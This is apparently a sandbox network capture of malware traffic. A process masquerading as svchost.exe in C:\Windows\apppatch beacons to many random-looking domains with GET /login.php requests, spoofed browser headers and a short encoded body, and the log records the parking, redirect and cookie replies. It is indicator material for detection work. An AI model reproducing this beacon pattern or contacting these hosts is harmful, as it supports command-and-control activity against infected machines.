Aug 23, 2024 18:47:52.202933073 CEST	303	IN	HTTP/1.1 302 Found Date: Fri, 23 Aug 2024 16:47:52 GMT Content-Type: text/html; charset=utf-8 Content-Length: 55 Connection: keep-alive Location: http://www.gahyqah.com/login.php X-Served-By: Namecheap URL Forward Server: namecheap-nginx Data Raw: 3c 61 20 68 72 65 66 3d 27 68 74 74 70 3a 2f 2f 77 77 77 2e 67 61 68 79 71 61 68 2e 63 6f 6d 2f 6c 6f 67 69 6e 2e 70 68 70 27 3e 46 6f 75 6e 64 3c 2f 61 3e 2e 0a 0a Data Ascii: <a href='http://www.gahyqah.com/login.php'>Found</a>.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
38	192.168.2.4	64274	44.221.84.105	80	6720	C:\Windows\apppatch\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Aug 23, 2024 18:47:51.434623957 CEST	373	OUT	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: vocyzit.com Content-Length: 6 Cookie: btst=3e0cadd8e2dc2fdcf92b9c2073c70c58\|8.46.123.33\|1724431621\|1724431621\|0\|1\|0; snkz=8.46.123.33 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Aug 23, 2024 18:47:51.938406944 CEST	333	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 23 Aug 2024 16:47:51 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Set-Cookie: btst=3e0cadd8e2dc2fdcf92b9c2073c70c58\|8.46.123.33\|1724431671\|1724431621\|25\|2\|0; path=/; domain=.vocyzit.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax; Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
39	192.168.2.4	64275	69.162.80.60	80	6720	C:\Windows\apppatch\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Aug 23, 2024 18:47:51.569689989 CEST	318	OUT	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lysyfyj.com Content-Length: 6 Cookie: sid=5243bebf-616f-11ef-adb1-e1f00ce9ce88 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Aug 23, 2024 18:47:52.109009027 CEST	772	IN	HTTP/1.1 200 OK accept-ch: Sec-CH-UA, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version, Sec-CH-UA-Mobile cache-control: max-age=0, private, must-revalidate connection: close content-length: 481 content-type: text/html; charset=utf-8 date: Fri, 23 Aug 2024 16:47:51 GMT server: nginx Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4c 6f 61 64 69 6e 67 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 3e 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 72 65 70 6c 61 63 65 28 27 68 74 74 70 3a 2f 2f 6c 79 73 79 66 79 6a 2e 63 6f 6d 2f 6c 6f 67 69 6e 2e 70 68 70 3f 63 68 3d 31 26 6a 73 3d 65 79 4a 68 62 47 63 69 4f 69 4a 49 55 7a 49 31 4e 69 49 73 49 6e 52 35 63 43 49 36 49 6b 70 58 56 43 4a 39 2e 65 79 4a 68 64 57 51 69 4f 69 4a 4b 62 32 74 6c 62 69 49 73 49 6d 56 34 63 43 49 36 4d 54 63 79 4e 44 51 7a 4f 44 67 33 4d 69 77 69 61 57 46 30 49 6a 6f 78 4e 7a 49 30 4e 44 4d 78 4e 6a 63 79 4c 43 4a 70 63 33 4d 69 4f 69 4a 4b 62 32 74 6c 62 69 49 73 49 6d 70 7a 49 6a 6f 78 4c 43 4a 71 64 47 6b 69 4f 69 49 79 64 6d 34 32 61 58 55 78 4d 32 39 77 4d 44 42 31 4d 6a 5a 74 62 32 63 77 59 57 35 71 4e 47 49 69 4c 43 4a 75 59 6d 59 69 4f 6a 45 33 4d 6a 51 30 4d 7a 45 32 4e 7a [TRUNCATED] Data Ascii: <html><head><title>Loading...</title></head><body><script type='text/javascript'>window.location.replace('http://lysyfyj.com/login.php?ch=1&js=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhdWQiOiJKb2tlbiIsImV4cCI6MTcyNDQzODg3MiwiaWF0IjoxNzI0NDMxNjcyLCJpc3MiOiJKb2tlbiIsImpzIjoxLCJqdGkiOiIydm42aXUxM29wMDB1MjZtb2cwYW5qNGIiLCJuYmYiOjE3MjQ0MzE2NzIsInRzIjoxNzI0NDMxNjcyMDQ2NTYxfQ.Ne4-mxaPTVeMqfnRBvDH87vkVfoIrftMvuRbLbM8nK8&sid=5243bebf-616f-11ef-adb1-e1f00ce9ce88');</script></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
40	192.168.2.4	64276	18.208.156.248	80	6720	C:\Windows\apppatch\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Aug 23, 2024 18:47:51.633881092 CEST	373	OUT	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: vonypom.com Content-Length: 6 Cookie: btst=ee59b14dfaa9c8907c706ea22e956ef8\|8.46.123.33\|1724431621\|1724431621\|0\|1\|0; snkz=8.46.123.33 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Aug 23, 2024 18:47:52.139826059 CEST	333	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 23 Aug 2024 16:47:52 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Set-Cookie: btst=ee59b14dfaa9c8907c706ea22e956ef8\|8.46.123.33\|1724431672\|1724431621\|25\|2\|0; path=/; domain=.vonypom.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax; Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
41	192.168.2.4	64277	3.94.10.34	80	6720	C:\Windows\apppatch\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Aug 23, 2024 18:47:51.643433094 CEST	373	OUT	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lymyxid.com Content-Length: 6 Cookie: btst=162891e75d1d854fb9d05e52998b5935\|8.46.123.33\|1724431621\|1724431621\|0\|1\|0; snkz=8.46.123.33 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Aug 23, 2024 18:47:52.143423080 CEST	333	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 23 Aug 2024 16:47:52 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Set-Cookie: btst=162891e75d1d854fb9d05e52998b5935\|8.46.123.33\|1724431672\|1724431621\|25\|2\|0; path=/; domain=.lymyxid.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax; Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
42	192.168.2.4	64283	172.234.222.143	80

Timestamp	Bytes transferred	Direction	Data
Aug 23, 2024 18:47:51.969778061 CEST	268	OUT	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: vojyqem.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
43	192.168.2.4	64284	5.79.71.225	80	6720	C:\Windows\apppatch\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Aug 23, 2024 18:47:52.041651011 CEST	268	OUT	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gatyfus.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
44	192.168.2.4	64285	91.195.240.19	80	6720	C:\Windows\apppatch\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Aug 23, 2024 18:47:52.212944031 CEST	277	OUT	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: www.gahyqah.com Connection: Keep-Alive Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Aug 23, 2024 18:47:52.905960083 CEST	1236	IN	HTTP/1.1 200 OK date: Fri, 23 Aug 2024 16:47:52 GMT content-type: text/html; charset=UTF-8 transfer-encoding: chunked vary: Accept-Encoding expires: Mon, 26 Jul 1997 05:00:00 GMT cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 pragma: no-cache x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_g5rlXs9RuRW4dglqQ5LydJEttSTVBsfpTg5YbTbTgxQyCxJaX/4wWztIAOuRl2yVYhX0WGF1Yaew3U85nGI5uA== last-modified: Fri, 23 Aug 2024 16:47:52 GMT x-cache-miss-from: parking-89b87dbbb-ntdtc server: Parking/1.0 Data Raw: 32 45 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 6e 79 6c 57 77 32 76 4c 59 34 68 55 6e 39 77 30 36 7a 51 4b 62 68 4b 42 66 76 6a 46 55 43 73 64 46 6c 62 36 54 64 51 68 78 62 39 52 58 57 58 75 49 34 74 33 31 63 2b 6f 38 66 59 4f 76 2f 73 38 71 31 4c 47 50 67 61 33 44 45 31 4c 2f 74 48 55 34 4c 45 4e 4d 43 41 77 45 41 41 51 3d 3d 5f 67 35 72 6c 58 73 39 52 75 52 57 34 64 67 6c 71 51 35 4c 79 64 4a 45 74 74 53 54 56 42 73 66 70 54 67 35 59 62 54 62 54 67 78 51 79 43 78 4a 61 58 2f 34 77 57 7a 74 49 41 4f 75 52 6c 32 79 56 59 68 58 30 57 47 46 31 59 61 65 77 33 55 38 35 6e 47 49 35 75 41 3d 3d 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 74 69 74 6c 65 3e 67 61 68 79 71 61 68 2e 63 6f 6d 26 6e 62 73 70 3b 2d 26 6e 62 73 70 3b 67 61 68 79 71 61 68 20 [TRUNCATED] Data Ascii: 2E3<!DOCTYPE html><html lang="en" data-adblockkey=MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_g5rlXs9RuRW4dglqQ5LydJEttSTVBsfpTg5YbTbTgxQyCxJaX/4wWztIAOuRl2yVYhX0WGF1Yaew3U85nGI5uA==><head><meta charset="utf-8"><title>gahyqah.com - gahyqah Resources and Information.</title><meta name="viewport" content="width=device-width,initial-scale=1.0,maximum-scale=1.0,user-scalable=0"><meta name="description" content="gahyqah.com is your first and best source for all of the information youre looking for. From ge
Aug 23, 2024 18:47:52.906145096 CEST	1236	IN	Data Raw: 6e 65 72 61 6c 20 74 6f 70 69 63 73 20 74 6f 20 6d 6f 72 65 20 6f 66 20 77 68 61 74 20 79 6f 75 20 77 6f 75 6c 64 20 65 78 70 65 63 74 20 74 6f 20 66 69 6e 64 20 68 65 72 65 2c 20 67 61 68 79 71 61 68 2e 63 6f 6d 20 68 61 73 20 69 74 20 61 6c 6c Data Ascii: neral topics to more of what you would expect to find here, gahyqah.com has it all. We hope you find what you are searching for!"><link 1088 rel="icon" type="image/png" href="//img.sedoparking.com/templates/logos/sed
Aug 23, 2024 18:47:52.906157970 CEST	1236	IN	Data Raw: 7b 62 6f 72 64 65 72 2d 73 74 79 6c 65 3a 6e 6f 6e 65 7d 73 76 67 3a 6e 6f 74 28 3a 72 6f 6f 74 29 7b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 62 75 74 74 6f 6e 2c 69 6e 70 75 74 2c 6f 70 74 67 72 6f 75 70 2c 73 65 6c 65 63 74 2c 74 65 78 Data Ascii: {border-style:none}svg:not(:root){overflow:hidden}button,input,optgroup,select,textarea{font-family:sans-serif;font-size:100%;line-height:1.15;margin:0}button,input{overflow:visible}button,select{text-transform:none}button,html [type=button],[
Aug 23, 2024 18:47:52.907152891 CEST	1236	IN	Data Raw: 74 2d 69 74 65 6d 7d 63 61 6e 76 61 73 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 7d 74 65 6d 70 6c 61 74 65 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 5b 68 69 64 64 65 6e 5d 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 2e 61 6e Data Ascii: t-item}canvas{display:inline-block}template{display:none}[hidden]{display:none}.announcement{background:#0e162e;text-align:center;padding:0 5px}.announcement p{color:#848484}.announcement a{color:#848484}.container-header{margin:0 auto 0 auto;
Aug 23, 2024 18:47:52.907165051 CEST	1236	IN	Data Raw: 6e 74 61 69 6e 65 72 2d 64 69 73 63 6c 61 69 6d 65 72 20 61 7b 63 6f 6c 6f 72 3a 23 39 34 39 34 39 34 7d 2e 63 6f 6e 74 61 69 6e 65 72 2d 69 6d 70 72 69 6e 74 7b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 63 6f 6e 74 61 69 6e 65 72 Data Ascii: ntainer-disclaimer a{color:#949494}.container-imprint{text-align:center}.container-imprint__content{display:inline-block}.container-imprint__content-text,.container-imprint__content-link{font-size:10px;color:#949494}.container-contact-us{text-
Aug 23, 2024 18:47:52.908210993 CEST	1236	IN	Data Raw: 66 6f 6e 74 2d 73 69 7a 65 3a 6c 61 72 67 65 72 7d 2e 63 6f 6e 74 61 69 6e 65 72 2d 63 6f 6f 6b 69 65 2d 6d 65 73 73 61 67 65 20 61 7b 63 6f 6c 6f 72 3a 23 66 66 66 7d 2e 63 6f 6f 6b 69 65 2d 6d 6f 64 61 6c 2d 77 69 6e 64 6f 77 7b 70 6f 73 69 74 Data Ascii: font-size:larger}.container-cookie-message a{color:#fff}.cookie-modal-window{position:fixed;background-color:rgba(200,200,200,.75);top:0;right:0;bottom:0;left:0;-webkit-transition:all .3s;-moz-transition:all .3s;transition:all .3s;text-align:c
Aug 23, 2024 18:47:52.908230066 CEST	1236	IN	Data Raw: 65 3a 69 6e 69 74 69 61 6c 7d 2e 62 74 6e 2d 2d 73 75 63 63 65 73 73 2d 73 6d 3a 68 6f 76 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 31 61 36 62 32 63 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 31 61 36 62 32 63 3b 63 6f 6c Data Ascii: e:initial}.btn--success-sm:hover{background-color:#1a6b2c;border-color:#1a6b2c;color:#fff;font-size:initial}.btn--secondary{background-color:#8c959c;border-color:#8c959c;color:#fff;font-size:medium}.btn--secondary:hover{background-color:#727c8
Aug 23, 2024 18:47:52.909483910 CEST	1236	IN	Data Raw: 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 65 31 36 32 65 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 41 72 69 61 6c 2c 48 65 6c 76 65 74 69 63 61 2c 56 65 72 64 61 6e 61 2c 22 4c 75 63 69 64 61 20 47 72 61 6e 64 65 22 2c 73 61 6e 73 2d 73 65 72 69 66 Data Ascii: round-color:#0e162e;font-family:Arial,Helvetica,Verdana,"Lucida Grande",sans-serif}body.cookie-message-enabled{padding-bottom:300px}.container-footer{padding-top:20px;padding-left:5%;padding-right:5%;padding-bottom:10px}.container-content{text
Aug 23, 2024 18:47:52.909499884 CEST	1236	IN	Data Raw: 28 2d 31 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 58 28 2d 31 29 3b 7a 2d 69 6e 64 65 78 3a 2d 31 3b 74 6f 70 3a 35 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 69 6e 68 65 72 69 74 7d 2e 63 6f 6e 74 61 69 6e 65 72 2d 63 6f 6e 74 65 6e 74 2d Data Ascii: (-1);transform:scaleX(-1);z-index:-1;top:50px;position:inherit}.container-content--lp{min-height:720px}.container-content--rp{min-height:820px}.container-content--rp .container-content__right,.container-content--rp .container-content__left{bac
Aug 23, 2024 18:47:52.909508944 CEST	556	IN	Data Raw: 65 6c 65 6d 65 6e 74 2d 6c 69 6e 6b 3a 6c 69 6e 6b 2c 2e 74 77 6f 2d 74 69 65 72 2d 61 64 73 2d 6c 69 73 74 5f 5f 6c 69 73 74 2d 65 6c 65 6d 65 6e 74 2d 6c 69 6e 6b 3a 76 69 73 69 74 65 64 7b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e Data Ascii: element-link:link,.two-tier-ads-list__list-element-link:visited{text-decoration:underline}.two-tier-ads-list__list-element-link:hover,.two-tier-ads-list__list-element-link:active,.two-tier-ads-list__list-element-link:focus{text-decoration:none
Aug 23, 2024 18:47:52.911372900 CEST	1236	IN	Data Raw: 74 2d 6c 69 6e 6b 3a 6c 69 6e 6b 2c 2e 77 65 62 61 72 63 68 69 76 65 2d 62 6c 6f 63 6b 5f 5f 6c 69 73 74 2d 65 6c 65 6d 65 6e 74 2d 6c 69 6e 6b 3a 76 69 73 69 74 65 64 7b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 2e 77 65 62 Data Ascii: t-link:link,.webarchive-block__list-element-link:visited{text-decoration:none}.webarchive-block__list-element-link:hover,.webarchive-block__list-element-link:active,.webarchive-block__list-element-link:focus{text-decoration:underline}body{marg

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
45	192.168.2.4	64288	5.79.71.225	80	6720	C:\Windows\apppatch\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Aug 23, 2024 18:48:11.498024940 CEST	268	OUT	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gatyfus.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
46	192.168.2.4	64289	13.248.169.48	80	6720	C:\Windows\apppatch\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Aug 23, 2024 18:48:23.604293108 CEST	268	OUT	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: pupydeq.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
47	192.168.2.4	64290	188.114.97.3	80	6720	C:\Windows\apppatch\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Aug 23, 2024 18:48:23.643982887 CEST	268	OUT	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lysyvan.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Aug 23, 2024 18:48:24.434413910 CEST	795	IN	HTTP/1.1 301 Moved Permanently Date: Fri, 23 Aug 2024 16:48:24 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: keep-alive Location: https://lysyvan.com/login.php CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vrn%2Fv2RFc1UwZx%2BAnaUTFz%2F55b16MI9o9vBU%2BYZmDZEICXq30OzLvBREgf%2Bkp3XWuVQWBDrrXwwFCxjTWmM2Vaz02jJQ0zTpwna5e4bYsEjcNTk2VDbUsw8lUZS6qg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8b7c97069a315e70-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 61 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: a2<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>0
Aug 23, 2024 18:48:27.689261913 CEST	268	OUT	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lysyvan.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Aug 23, 2024 18:48:28.798979044 CEST	797	IN	HTTP/1.1 301 Moved Permanently Date: Fri, 23 Aug 2024 16:48:28 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: keep-alive Location: https://lysyvan.com/login.php CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=L%2FF2znX5BKFETzqc2l7IbL717hn3G7%2FerE5ndnIjkesya%2BnemsCuhn4T1aQwPf71l%2BJwCWSxiODPlDSSHaddlmJgp42IUs8uwUd8KMV3sLJ1N%2Bf7OVv%2FHhcewAfXhA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8b7c971d6b9b5e70-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 61 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: a2<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
48	192.168.2.4	64291	18.208.156.248	80	6720	C:\Windows\apppatch\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Aug 23, 2024 18:48:23.810475111 CEST	373	OUT	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: pupycag.com Content-Length: 6 Cookie: btst=0e9c6b135bbf78b20bee3c60ff917523\|8.46.123.33\|1724431636\|1724431636\|0\|1\|0; snkz=8.46.123.33 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Aug 23, 2024 18:48:24.316374063 CEST	333	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 23 Aug 2024 16:48:24 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Set-Cookie: btst=0e9c6b135bbf78b20bee3c60ff917523\|8.46.123.33\|1724431704\|1724431636\|34\|2\|0; path=/; domain=.pupycag.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax; Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
49	192.168.2.4	64292	103.150.11.230	80	6720	C:\Windows\apppatch\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Aug 23, 2024 18:48:23.943445921 CEST	268	OUT	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lyrysor.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Aug 23, 2024 18:48:24.867440939 CEST	403	IN	HTTP/1.1 302 Moved Temporarily Server: openresty/1.15.8.1 Date: Fri, 23 Aug 2024 16:48:24 GMT Content-Type: text/html Content-Length: 151 Connection: keep-alive Location: http://106.15.137.66:8001/dh/147287063_637385.html#index8?d=lyrysor.com Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 31 35 2e 38 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty/1.15.8.1</center></body></html>
Aug 23, 2024 18:48:25.990607977 CEST	268	OUT	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lyrysor.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
